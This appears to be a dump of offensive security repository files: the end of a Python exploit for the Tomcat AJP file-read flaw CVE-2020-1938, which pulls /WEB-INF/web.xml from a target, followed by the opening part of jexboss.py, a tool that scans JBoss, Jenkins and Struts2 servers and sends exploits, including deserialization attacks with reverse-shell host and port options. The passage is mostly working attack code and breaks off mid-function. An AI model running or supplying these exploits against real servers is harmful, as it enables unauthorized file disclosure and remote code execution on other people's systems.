163 | header = struct.pack(">bbh", 0x41, 0x42, len(res))
164 | return header + res
165 |
166 | def parse(self, raw_packet):
167 | stream = StringIO(raw_packet)
168 | self.magic1, self.magic2, data_len = unpack(stream, "bbH")
169 | self.prefix_code, self.method = unpack(stream, "bb")
170 | self.protocol = unpack_string(stream)
171 | self.req_uri = unpack_string(stream)
172 | self.remote_addr = unpack_string(stream)
173 | self.remote_host = unpack_string(stream)
174 | self.server_name = unpack_string(stream)
175 | self.server_port = unpack(stream, ">h")
176 | self.is_ssl = unpack(stream, "?")
177 | self.num_headers, = unpack(stream, ">H")
178 | self.request_headers = {}
179 | for i in range(self.num_headers):
180 | code, = unpack(stream, ">H")
181 | if code > 0xA000:
182 | h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
183 | else:
184 | h_name = unpack(stream, "%ds" % code)
185 | stream.read(1) # \0
186 | h_value = unpack_string(stream)
187 | self.request_headers[h_name] = h_value
188 |
189 | def send_and_receive(self, socket, stream, save_cookies=False):
190 | res = []
191 | i = socket.sendall(self.serialize())
192 | if self.method == AjpForwardRequest.POST:
193 | return res
194 |
195 | r = AjpResponse.receive(stream)
196 | assert r.prefix_code == AjpResponse.SEND_HEADERS
197 | res.append(r)
198 | if save_cookies and 'Set-Cookie' in r.response_headers:
199 | self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']
200 |
201 | # read body chunks and end response packets
202 | while True:
203 | r = AjpResponse.receive(stream)
204 | res.append(r)
205 | if r.prefix_code == AjpResponse.END_RESPONSE:
206 | break
207 | elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
208 | continue
209 | else:
210 | raise NotImplementedError
211 | break
212 |
213 | return res
214 |
215 |
216 | class AjpResponse(object):
217 | _, _, _, SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
218 | COMMON_SEND_HEADERS = [
219 | "Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
220 | "Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
221 | ]
222 |
223 | def parse(self, stream):
224 | # read headers
225 | self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")
226 |
227 | if self.prefix_code == AjpResponse.SEND_HEADERS:
228 | self.parse_send_headers(stream)
229 | elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
230 | self.parse_send_body_chunk(stream)
231 | elif self.prefix_code == AjpResponse.END_RESPONSE:
232 | self.parse_end_response(stream)
233 | elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
234 | self.parse_get_body_chunk(stream)
235 | else:
236 | raise NotImplementedError
237 |
238 | def parse_send_headers(self, stream):
239 | self.http_status_code, = unpack(stream, ">H")
240 | self.http_status_msg = unpack_string(stream)
241 | self.num_headers, = unpack(stream, ">H")
242 | self.response_headers = {}
243 | for i in range(self.num_headers):
244 | code, = unpack(stream, ">H")
245 | if code <= 0xA000: # custom header
246 | h_name, = unpack(stream, "%ds" % code)
247 | stream.read(1) # \0
248 | h_value = unpack_string(stream)
249 | else:
250 | h_name = AjpResponse.COMMON_SEND_HEADERS[code - 0xA001]
251 | h_value = unpack_string(stream)
252 | self.response_headers[h_name] = h_value
253 |
254 | def parse_send_body_chunk(self, stream):
255 | self.data_length, = unpack(stream, ">H")
256 | self.data = stream.read(self.data_length + 1)
257 |
258 | def parse_end_response(self, stream):
259 | self.reuse, = unpack(stream, "b")
260 |
261 | def parse_get_body_chunk(self, stream):
262 | rlen, = unpack(stream, ">H")
263 | return rlen
264 |
265 | @staticmethod
266 | def receive(stream):
267 | r = AjpResponse()
268 | r.parse(stream)
269 | return r
270 |
271 |
272 | def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
273 | fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
274 | fr.method = method
275 | fr.protocol = "HTTP/1.1"
276 | fr.req_uri = req_uri
277 | fr.remote_addr = target_host
278 | fr.remote_host = None
279 | fr.server_name = target_host
280 | fr.server_port = 80
281 | fr.request_headers = {
282 | 'SC_REQ_ACCEPT': 'text/html',
283 | 'SC_REQ_CONNECTION': 'keep-alive',
284 | 'SC_REQ_CONTENT_LENGTH': '0',
285 | 'SC_REQ_HOST': target_host,
286 | 'SC_REQ_USER_AGENT': 'Mozilla',
287 | 'Accept-Encoding': 'gzip, deflate, sdch',
288 | 'Accept-Language': 'en-US,en;q=0.5',
289 | 'Upgrade-Insecure-Requests': '1',
290 | 'Cache-Control': 'max-age=0'
291 | }
292 | fr.is_ssl = False
293 | fr.attributes = []
294 | return fr
295 |
296 |
297 | class Tomcat(object):
298 | def __init__(self, target_host, target_port):
299 | self.target_host = target_host
300 | self.target_port = target_port
301 | self.socket = socket(AF_INET, SOCK_STREAM)
302 | self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
303 | self.socket.connect((target_host, target_port))
304 | self.stream = self.socket.makefile("rb", buffering=0)
305 |
306 | def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
307 | self.req_uri = req_uri
308 | self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri,
309 | method=AjpForwardRequest.REQUEST_METHODS.get(method))
310 | print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
311 | if user is not None and password is not None:
312 | self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + (
313 | "%s:%s" % (user, password)).encode('base64').replace('\n', '')
314 | for h in headers:
315 | self.forward_request.request_headers[h] = headers[h]
316 | for a in attributes:
317 | self.forward_request.attributes.append(a)
318 | responses = self.forward_request.send_and_receive(self.socket, self.stream)
319 | if len(responses) == 0:
320 | return None, None
321 | snd_hdrs_res = responses[0]
322 | data_res = responses[1:-1]
323 | if len(data_res) == 0:
324 | print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
325 | return snd_hdrs_res, data_res
326 |
327 |
328 | def attack(URL):
329 | print('[+]开始检测-Tomcat-CVE-2020-1938。[+]')
330 | #url中不带有端口
331 | if len(URL.split(':')) == 2:
332 | port = 8009
333 | print('port',port)
334 | print('ip',URL.split(':')[1][2:])
335 | try:
336 | t = Tomcat(URL.split(':')[1][2:], port)
337 | _, data = t.perform_request('/asdf', attributes=[
338 | {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
339 | {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']},
340 | {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
341 | ])
342 | print('----------------------------')
343 | print(type(data))
344 | print(data[0].data.decode('UTF-8'))
345 | except Exception as e:
346 | print(e,'Some error!')
347 |
348 | #url中带有端口
349 | elif len(URL.split(':')) == 3:
350 | print('ip',URL.split(':')[1][2:])
351 | print('port',URL.split(':')[2])
352 | try:
353 | t = Tomcat(URL.split(':')[1][2:], int(URL.split(':')[2]))
354 | _, data = t.perform_request('/asdf', attributes=[
355 | {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
356 | {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']},
357 | {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
358 | ])
359 | print('----------------------------')
360 | print(type(data))
361 | print(data[0].data.decode('UTF-8'))
362 | except Exception as e:
363 | print(e,'Some error!')
364 | print('=================================')
365 | if int(URL.split(':')[2]) != 8009:
366 | print('ip', URL.split(':')[1][2:])
367 | print('port', 8009)
368 | try:
369 | t = Tomcat(URL.split(':')[1][2:], 8009)
370 | _, data = t.perform_request('/asdf', attributes=[
371 | {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
372 | {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']},
373 | {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
374 | ])
375 | print('----------------------------')
376 | print(type(data))
377 | print(data[0].data.decode('UTF-8'))
378 | except Exception as e:
379 | print(e,'Some error!')
380 | else:
381 | pass
382 | else:
383 | print('url error')
384 | print('[+]检测结束-Tomcat-CVE-2020-1938。[+]')
385 | print('\n')
386 |
387 |
388 | if __name__ == '__main__':
389 | attack()
390 |
--------------------------------------------------------------------------------
/jboss/jexboss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | """
4 | JexBoss: Jboss verify and EXploitation Tool
5 | https://github.com/joaomatosf/jexboss
6 |
7 | Copyright 2013 João Filho Matos Figueiredo
8 |
9 | Licensed under the Apache License, Version 2.0 (the "License");
10 | you may not use this file except in compliance with the License.
11 | You may obtain a copy of the License at
12 |
13 | http://www.apache.org/licenses/LICENSE-2.0
14 |
15 | Unless required by applicable law or agreed to in writing, software
16 | distributed under the License is distributed on an "AS IS" BASIS,
17 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
18 | See the License for the specific language governing permissions and
19 | limitations under the License.
20 | """
21 | import textwrap
22 | import traceback
23 | import logging
24 | import datetime
25 | import signal
26 | import _exploits
27 | import _updates
28 | from os import name, system
29 | import os, sys
30 | import shutil
31 | from zipfile import ZipFile
32 | from time import sleep
33 | from random import randint
34 | import argparse, socket
35 | from sys import argv, exit, version_info
36 | logging.captureWarnings(True)
37 | FORMAT = "%(asctime)s (%(levelname)s): %(message)s"
38 | logging.basicConfig(filename='jexboss_'+str(datetime.datetime.today().date())+'.log', format=FORMAT, level=logging.INFO)
39 |
40 | __author__ = "João Filho Matos Figueiredo "
41 | __version__ = "1.2.4"
42 |
43 | RED = '\x1b[91m'
44 | RED1 = '\033[31m'
45 | BLUE = '\033[94m'
46 | GREEN = '\033[32m'
47 | BOLD = '\033[1m'
48 | NORMAL = '\033[0m'
49 | ENDC = '\033[0m'
50 |
51 |
52 | def print_and_flush(message, same_line=False):
53 | if same_line:
54 | print (message),
55 | else:
56 | print (message)
57 | if not sys.stdout.isatty():
58 | sys.stdout.flush()
59 |
60 |
61 | if version_info[0] == 2 and version_info[1] < 7:
62 | print_and_flush(RED1 + BOLD + "\n * You are using the Python version 2.6. The JexBoss requires version >= 2.7.\n"
63 | "" + GREEN + " Please install the Python version >= 2.7. \n\n"
64 | " Example for CentOS using Software Collections scl:\n"
65 | " # yum -y install centos-release-scl\n"
66 | " # yum -y install python27\n"
67 | " # scl enable python27 bash\n" + ENDC)
68 | logging.CRITICAL('Python version 2.6 is not supported.')
69 | exit(0)
70 |
71 | try:
72 | import readline
73 | readline.parse_and_bind('set editing-mode vi')
74 | except:
75 | logging.warning('Module readline not installed. The terminal will not support the arrow keys.', exc_info=traceback)
76 | print_and_flush(RED1 + "\n * Module readline not installed. The terminal will not support the arrow keys.\n" + ENDC)
77 |
78 |
79 | try:
80 | from urllib.parse import urlencode
81 | except ImportError:
82 | from urllib import urlencode
83 |
84 | try:
85 | from urllib3.util import parse_url
86 | from urllib3 import PoolManager
87 | from urllib3 import ProxyManager
88 | from urllib3 import make_headers
89 | from urllib3.util import Timeout
90 | except ImportError:
91 | print_and_flush(RED1 + BOLD + "\n * Package urllib3 not installed. Please install the dependencies before continue.\n"
92 | "" + GREEN + " Example: \n"
93 | " # pip install -r requires.txt\n" + ENDC)
94 | logging.critical('Module urllib3 not installed. See details:', exc_info=traceback)
95 | exit(0)
96 |
97 | try:
98 | import ipaddress
99 | except:
100 | print_and_flush(RED1 + BOLD + "\n * Package ipaddress not installed. Please install the dependencies before continue.\n"
101 | "" + GREEN + " Example: \n"
102 | " # pip install -r requires.txt\n" + ENDC)
103 | logging.critical('Module ipaddress not installed. See details:', exc_info=traceback)
104 | exit(0)
105 |
106 | global gl_interrupted
107 | gl_interrupted = False
108 | global gl_args
109 | global gl_http_pool
110 |
111 |
112 | def get_random_user_agent():
113 | user_agents = ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0",
114 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
115 | "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36",
116 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9",
117 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36",
118 | "Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0",
119 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
120 | "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)",
121 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
122 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
123 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36",
124 | "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17",
125 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
126 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"]
127 | return user_agents[randint(0, len(user_agents) - 1)]
128 |
129 |
130 | def is_proxy_ok():
131 | print_and_flush(GREEN + "\n ** Checking proxy: %s **\n\n" % gl_args.proxy)
132 |
133 | headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
134 | "Connection": "keep-alive",
135 | "User-Agent": get_random_user_agent()}
136 | try:
137 | r = gl_http_pool.request('GET', gl_args.host, redirect=False, headers=headers)
138 | except:
139 | print_and_flush(RED + " * Error: Failed to connect to %s using proxy %s.\n"
140 | " See logs for more details...\n" %(gl_args.host,gl_args.proxy) + ENDC)
141 | logging.warning("Failed to connect to %s using proxy" %gl_args.host, exc_info=traceback)
142 | return False
143 |
144 | if r.status == 407:
145 | print_and_flush(RED + " * Error 407: Proxy authentication is required. \n"
146 | " Please enter the correct login and password for authentication. \n"
147 | " Example: -P http://proxy.com:3128 -L username:password\n" + ENDC)
148 | logging.error("Proxy authentication failed")
149 | return False
150 |
151 | elif r.status == 503 or r.status == 502:
152 | print_and_flush(RED + " * Error %s: The service %s is not availabel to your proxy. \n"
153 | " See logs for more details...\n" %(r.status,gl_args.host)+ENDC)
154 | logging.error("Service unavailable to your proxy")
155 | return False
156 | else:
157 | return True
158 |
159 |
160 | def configure_http_pool():
161 |
162 | global gl_http_pool
163 |
164 | if gl_args.mode == 'auto-scan' or gl_args.mode == 'file-scan':
165 | timeout = Timeout(connect=1.0, read=3.0)
166 | else:
167 | timeout = Timeout(connect=gl_args.timeout, read=6.0)
168 |
169 | if gl_args.proxy:
170 | # when using proxy, protocol should be informed
171 | if (gl_args.host is not None and 'http' not in gl_args.host) or 'http' not in gl_args.proxy:
172 | print_and_flush(RED + " * When using proxy, you must specify the http or https protocol"
173 | " (eg. http://%s).\n\n" %(gl_args.host if 'http' not in gl_args.host else gl_args.proxy) +ENDC)
174 | logging.critical('Protocol not specified')
175 | exit(1)
176 |
177 | try:
178 | if gl_args.proxy_cred:
179 | headers = make_headers(proxy_basic_auth=gl_args.proxy_cred)
180 | gl_http_pool = ProxyManager(proxy_url=gl_args.proxy, proxy_headers=headers, timeout=timeout, cert_reqs='CERT_NONE')
181 | else:
182 | gl_http_pool = ProxyManager(proxy_url=gl_args.proxy, timeout=timeout, cert_reqs='CERT_NONE')
183 | except:
184 | print_and_flush(RED + " * An error occurred while setting the proxy. Please see log for details..\n\n" +ENDC)
185 | logging.critical('Error while setting the proxy', exc_info=traceback)
186 | exit(1)
187 | else:
188 | gl_http_pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE')
189 |
190 |
191 | def handler_interrupt(signum, frame):
192 | global gl_interrupted
193 | gl_interrupted = True
194 | print_and_flush ("Interrupting execution ...")
195 | logging.info("Interrupting execution ...")
196 | exit(1)
197 |
198 | signal.signal(signal.SIGINT, handler_interrupt)
199 |
200 |
201 | def check_connectivity(host, port):
202 | try:
203 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
204 | s.settimeout(2)
205 | s.connect((str(host), int(port)))
206 | s.close()
207 | except socket.timeout:
208 | logging.info("Failed to connect to %s:%s" %(host,port))
209 | return False
210 | except:
211 | logging.info("Failed to connect to %s:%s" % (host, port))
212 | return False
213 |
214 | return True
215 |
216 |
217 | def check_vul(url):
218 | """
219 | Test if a GET to a URL is successful
220 | :param url: The URL to test
221 | :return: A dict with the exploit type as the keys, and the HTTP status code as the value
222 | """
223 | url_check = parse_url(url)
224 | if '443' in str(url_check.port) and url_check.scheme != 'https':
225 | url = "https://"+str(url_check.host)+":"+str(url_check.port)+str(url_check.path)
226 |
227 | print_and_flush(GREEN + "\n ** Checking Host: %s **\n" % url)
228 | logging.info("Checking Host: %s" % url)
229 |
230 | headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
231 | "Connection": "keep-alive",
232 | "User-Agent": get_random_user_agent()}
233 |
234 | paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
235 | "web-console": "/web-console/Invoker",
236 | "JMXInvokerServlet": "/invoker/JMXInvokerServlet",
237 | "admin-console": "/admin-console/",
238 | "Application Deserialization": "",
239 | "Servlet Deserialization" : "",
240 | "Jenkins": "",
241 | "Struts2": "",
242 | "JMX Tomcat" : ""}
243 |
244 | fatal_error = False
245 |
246 | for vector in paths:
247 | r = None
248 | if gl_interrupted: break
249 | try:
250 |
251 | # check jmx tomcat only if specifically chosen
252 | if (gl_args.jmxtomcat and vector != 'JMX Tomcat') or\
253 | (not gl_args.jmxtomcat and vector == 'JMX Tomcat'): continue
254 |
255 | if gl_args.app_unserialize and vector != 'Application Deserialization': continue
256 |
257 | if gl_args.struts2 and vector != 'Struts2': continue
258 |
259 | if gl_args.servlet_unserialize and vector != 'Servlet Deserialization': continue
260 |
261 | if gl_args.jboss and vector not in ('jmx-console', 'web-console', 'JMXInvokerServlet', 'admin-console'): continue
262 |
263 | if gl_args.jenkins and vector != 'Jenkins': continue
264 |
265 | if gl_args.force:
266 | paths[vector] = 200
267 | continue
268 |
269 | print_and_flush(GREEN + " [*] Checking %s: %s" % (vector, " " * (27 - len(vector))) + ENDC, same_line=True)
270 |
271 | # check jenkins
272 | if vector == 'Jenkins':
273 |
274 | cli_port = None
275 | # check version and search for CLI-Port
276 | r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
277 | all_headers = r.getheaders()
278 |
279 | # versions > 658 are not vulnerable
280 | if 'X-Jenkins' in all_headers:
281 | version = int(all_headers['X-Jenkins'].split('.')[1].split('.')[0])
282 | if version >= 638:
283 | paths[vector] = 505
284 | continue
285 |
286 | for h in all_headers:
287 | if 'CLI-Port' in h:
288 | cli_port = int(all_headers[h])
289 | break
290 |
291 | if cli_port is not None:
292 | paths[vector] = 200
293 | else:
294 | paths[vector] = 505
295 |
296 | # chek vul for Java Unserializable in Application Parameters
297 | elif vector == 'Application Deserialization':
298 |
299 | r = gl_http_pool.request('GET', url, redirect=False, headers=headers)
300 | if r.status in (301, 302, 303, 307, 308):
301 | cookie = r.getheader('set-cookie')
302 | if cookie is not None: headers['Cookie'] = cookie
303 | r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
304 | # link, obj = _exploits.get_param_value(r.data, gl_args.post_parameter)
305 | obj = _exploits.get_serialized_obj_from_param(str(r.data), gl_args.post_parameter)
306 |
307 | # if no obj serialized, check if there's a html refresh redirect and follow it
308 | if obj is None:
309 | # check if theres a redirect link
310 | link = _exploits.get_html_redirect_link(str(r.data))
311 |
312 | # If it is a redirect link. Follow it
313 | if link is not None:
314 | r = gl_http_pool.request('GET', url + "/" + link, redirect=True, headers=headers)
315 | #link, obj = _exploits.get_param_value(r.data, gl_args.post_parameter)
316 | obj = _exploits.get_serialized_obj_from_param(str(r.data), gl_args.post_parameter)
317 |
318 | # if obj does yet None
319 | if obj is None:
320 | # search for other params that can be exploited
321 | list_params = _exploits.get_list_params_with_serialized_objs(str(r.data))
322 | if len(list_params) > 0:
323 | paths[vector] = 110
324 | print_and_flush(RED + " [ CHECK OTHER PARAMETERS ]" + ENDC)
325 | print_and_flush(RED + "\n * The \"%s\" parameter does not appear to be vulnerable.\n" %gl_args.post_parameter +
326 | " But there are other parameters that it seems to be xD!\n" +ENDC+GREEN+
327 | BOLD+ "\n Try these other parameters: \n" +ENDC)
328 | for p in list_params:
329 | print_and_flush(GREEN + " -H %s" %p+ ENDC)
330 | print ("")
331 | elif obj is not None and obj == 'stateless':
332 | paths[vector] = 100
333 | elif obj is not None:
334 | paths[vector] = 200
335 |
336 | # chek vul for Java Unserializable in viewState
337 | elif vector == 'Servlet Deserialization':
338 |
339 | r = gl_http_pool.request('GET', url, redirect=False, headers=headers)
340 | if r.status in (301, 302, 303, 307, 308):
341 | cookie = r.getheader('set-cookie')
342 | if cookie is not None: headers['Cookie'] = cookie
343 | r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
344 |
345 | if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'):
346 | paths[vector] = 200
347 | else:
348 | paths[vector] = 505
349 |
350 | elif vector == 'Struts2':
351 |
352 | result = _exploits.exploit_struts2_jakarta_multipart(url, 'jexboss', gl_args.cookies)
353 | if result is None or "Could not get command" in str(result) :
354 | paths[vector] = 100
355 | elif 'jexboss' in str(result) and "" not in str(result).lower():
356 | paths[vector] = 200
357 | else:
358 | paths[vector] = 505
359 |
360 | elif vector == 'JMX Tomcat':
361 |
362 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
363 | s.settimeout(7)
364 | host_rmi = url.split(':')[0]
365 | port_rmi = int(url.split(':')[1])
366 | s.connect((host_rmi, port_rmi))
367 | s.send(b"JRMI\x00\x02K")
368 | msg = s.recv(1024)
369 | octets = str(msg[3:]).split(".")
370 | if len(octets) != 4:
371 | paths[vector] = 505
372 | else:
373 | paths[vector] = 200
374 |
375 | # check jboss vectors
376 | elif vector == "JMXInvokerServlet":
377 | # user privided web-console path and checking JMXInvoker...
378 | if "/web-console/Invoker" in url:
379 | paths[vector] = 505
380 | # if the user not provided the path, append the "/invoker/JMXInvokerServlet"
381 | else:
382 |
383 | if not url.endswith(str(paths[vector])) and not url.endswith(str(paths[vector])+"/"):
384 | url_to_check = url + str(paths[vector])
385 | else:
386 | url_to_check = url
387 |
388 | r = gl_http_pool.request('HEAD', url_to_check , redirect=False, headers=headers)
389 | # if head method is not allowed/supported, try GET
390 | if r.status in (405, 406):
391 | r = gl_http_pool.request('GET', url_to_check , redirect=False, headers=headers)
392 |
393 | # if web-console/Invoker or invoker/JMXInvokerServlet
394 | if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'):
395 | paths[vector] = 200
396 | else:
397 | paths[vector] = 505
398 |
399 | elif vector == "web-console":
400 | # user privided JMXInvoker path and checking web-console...
401 | if "/invoker/JMXInvokerServlet" in url:
402 | paths[vector] = 505
403 | # if the user not provided the path, append the "/web-console/..."
404 | else:
405 |
406 | if not url.endswith(str(paths[vector])) and not url.endswith(str(paths[vector]) + "/"):
407 | url_to_check = url + str(paths[vector])
408 | else:
409 | url_to_check = url
410 |
411 | r = gl_http_pool.request('HEAD', url_to_check, redirect=False, headers=headers)
412 | # if head method is not allowed/supported, try GET
413 | if r.status in (405, 406):
414 | r = gl_http_pool.request('GET', url_to_check, redirect=False, headers=headers)
415 |
416 | # if web-console/Invoker or invoker/JMXInvokerServlet
417 | if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'):
418 | paths[vector] = 200
419 | else:
420 | paths[vector] = 505
421 |
422 | # other jboss vector
423 | else:
424 | r = gl_http_pool.request('HEAD', url + str(paths[vector]), redirect=False, headers=headers)
425 | # if head method is not allowed/supported, try GET
426 | if r.status in (405, 406):
427 | r = gl_http_pool.request('GET', url + str(paths[vector]), redirect=False, headers=headers)
428 | # check if the server respond with 200/500 for all requests
429 | if r.status in (200, 500):
430 | r = gl_http_pool.request('GET', url + str(paths[vector])+ '/github.com/joaomatosf/jexboss', redirect=False,headers=headers)
431 |
432 | if r.status == 200:
433 | r.status = 505
434 | else:
435 | r.status = 200
436 |
437 | paths[vector] = r.status
438 |
439 | # ----------------
440 | # Analysis of the results
441 | # ----------------
442 | # check if the proxy do not support running in the same port of the target
443 | if r is not None and r.status == 400 and gl_args.proxy:
444 | if parse_url(gl_args.proxy).port == url_check.port:
445 | print_and_flush(RED + "[ ERROR ]\n * An error occurred because the proxy server is running on the "
446 | "same port as the server port (port %s).\n"
447 | " Please use a different port in the proxy.\n" % url_check.port + ENDC)
448 | logging.critical("Proxy returns 400 Bad Request because is running in the same port as the server")
449 | fatal_error = True
450 | break
451 |
452 | # check if it's false positive
453 | if r is not None and len(r.getheaders()) == 0:
454 | print_and_flush(RED + "[ ERROR ]\n * The server %s is not an HTTP server.\n" % url + ENDC)
455 | logging.error("The server %s is not an HTTP server." % url)
456 | for key in paths: paths[key] = 505
457 | break
458 |
459 | if paths[vector] in (301, 302, 303, 307, 308):
460 | url_redirect = r.get_redirect_location()
461 | print_and_flush(GREEN + " [ REDIRECT ]\n * The server sent a redirect to: %s\n" % url_redirect)
462 | elif paths[vector] == 200 or paths[vector] == 500:
463 | if vector == "admin-console":
464 | print_and_flush(RED + " [ EXPOSED ]" + ENDC)
465 | logging.info("Server %s: EXPOSED" %url)
466 | elif vector == "Jenkins":
467 | print_and_flush(RED + " [ POSSIBLE VULNERABLE ]" + ENDC)
468 | logging.info("Server %s: RUNNING JENKINS" %url)
469 | elif vector == "JMX Tomcat":
470 | print_and_flush(RED + " [ MAYBE VULNERABLE ]" + ENDC)
471 | logging.info("Server %s: RUNNING JENKINS" %url)
472 | else:
473 | print_and_flush(RED + " [ VULNERABLE ]" + ENDC)
474 | logging.info("Server %s: VULNERABLE" % url)
475 | elif paths[vector] == 100:
476 | paths[vector] = 200
477 | print_and_flush(RED + " [ INCONCLUSIVE - NEED TO CHECK ]" + ENDC)
478 | logging.info("Server %s: INCONCLUSIVE - NEED TO CHECK" % url)
479 | elif paths[vector] == 110:
480 | logging.info("Server %s: CHECK OTHERS PARAMETERS" % url)
481 | else:
482 | print_and_flush(GREEN + " [ OK ]")
483 | except Exception as err:
484 | print_and_flush(RED + "\n * An error occurred while connecting to the host %s (%s)\n" % (url, err) + ENDC)
485 | logging.info("An error occurred while connecting to the host %s" % url, exc_info=traceback)
486 | paths[vector] = 505
487 |
488 | if fatal_error:
489 | exit(1)
490 | else:
491 | return paths
492 |
493 |
494 | def auto_exploit(url, exploit_type):
495 | """
496 | Automatically exploit a URL
497 | :param url: The URL to exploit
498 | :param exploit_type: One of the following
499 | exploitJmxConsoleFileRepository: tested and working in JBoss 4 and 5
500 | exploitJmxConsoleMainDeploy: tested and working in JBoss 4 and 6
501 | exploitWebConsoleInvoker: tested and working in JBoss 4
502 | exploitJMXInvokerFileRepository: tested and working in JBoss 4 and 5
503 | exploitAdminConsole: tested and working in JBoss 5 and 6 (with default password)
504 | """
505 | if exploit_type in ("Application Deserialization", "Servlet Deserialization"):
506 | print_and_flush(GREEN + "\n * Preparing to send exploit to %s. Please wait...\n" % url)
507 | else:
508 | print_and_flush(GREEN + "\n * Sending exploit code to %s. Please wait...\n" % url)
509 |
510 | result = 505
511 | if exploit_type == "jmx-console":
512 |
513 | result = _exploits.exploit_jmx_console_file_repository(url)
514 | if result != 200 and result != 500:
515 | result = _exploits.exploit_jmx_console_main_deploy(url)
516 |
517 | elif exploit_type == "web-console":
518 |
519 | # if the user not provided the path
520 | if url.endswith("/web-console/Invoker") or url.endswith("/web-console/Invoker/"):
521 | url = url.replace("/web-console/Invoker", "")
522 |
523 | result = _exploits.exploit_web_console_invoker(url)
524 | if result == 404:
525 | host, port = get_host_port_reverse_params()
526 | if host == port == gl_args.cmd == None: return False
527 | result = _exploits.exploit_servlet_deserialization(url + "/web-console/Invoker", host=host, port=port,
528 | cmd=gl_args.cmd, is_win=gl_args.windows, gadget=gl_args.gadget,
529 | gadget_file=gl_args.load_gadget)
530 | elif exploit_type == "JMXInvokerServlet":
531 |
532 | # if the user not provided the path
533 | if url.endswith("/invoker/JMXInvokerServlet") or url.endswith("/invoker/JMXInvokerServlet/"):
534 | url = url.replace("/invoker/JMXInvokerServlet", "")
535 |
536 | result = _exploits.exploit_jmx_invoker_file_repository(url, 0)
537 | if result != 200 and result != 500:
538 | result = _exploits.exploit_jmx_invoker_file_repository(url, 1)
539 | if result == 404:
540 | host, port = get_host_port_reverse_params()
541 | if host == port == gl_args.cmd == None: return False
542 | result = _exploits.exploit_servlet_deserialization(url + "/invoker/JMXInvokerServlet", host=host, port=port,
543 | cmd=gl_args.cmd, is_win=gl_args.windows, gadget=gl_args.gadget,
544 | gadget_file=gl_args.load_gadget)
545 |
546 | elif exploit_type == "admin-console":
547 |
548 | result = _exploits.exploit_admin_console(url, gl_args.jboss_login)
549 |
550 | elif exploit_type == "Jenkins":
551 |
552 | host, port = get_host_port_reverse_params()
553 | if host == port == gl_args.cmd == None: return False
554 | result = _exploits.exploit_jenkins(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows,
